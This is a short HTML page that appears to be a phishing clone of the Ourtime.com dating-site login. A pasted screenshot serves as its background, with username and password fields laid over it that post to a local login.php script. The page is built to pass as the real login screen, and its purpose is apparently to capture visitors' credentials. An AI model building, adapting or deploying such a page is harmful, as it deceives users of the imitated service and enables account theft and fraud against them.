<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Ourtime.com Login</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1345px; height:633px; z-index:0"><img src="images/paste199.jpg" alt="" title="" border=0 width=1345 height=633></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:206px;left:231px;top:162px;z-index:2;height: 31px;">
<input name="formtext2" type="password" style="position:absolute;width:206px;left:230px;top:210px;z-index:3;height: 31px;">
<div id="formcheckbox1" style="position:absolute; left:226px; top:252px; z-index:4"><input type="checkbox" name="formcheckbox1"></div>
<div id="formimage1" style="position:absolute; left:221px; top:288px; z-index:5"><input type="image" name="formimage1" width="79" height="40" src="images/button.PNG"></div>
</form>


</body>
</html>
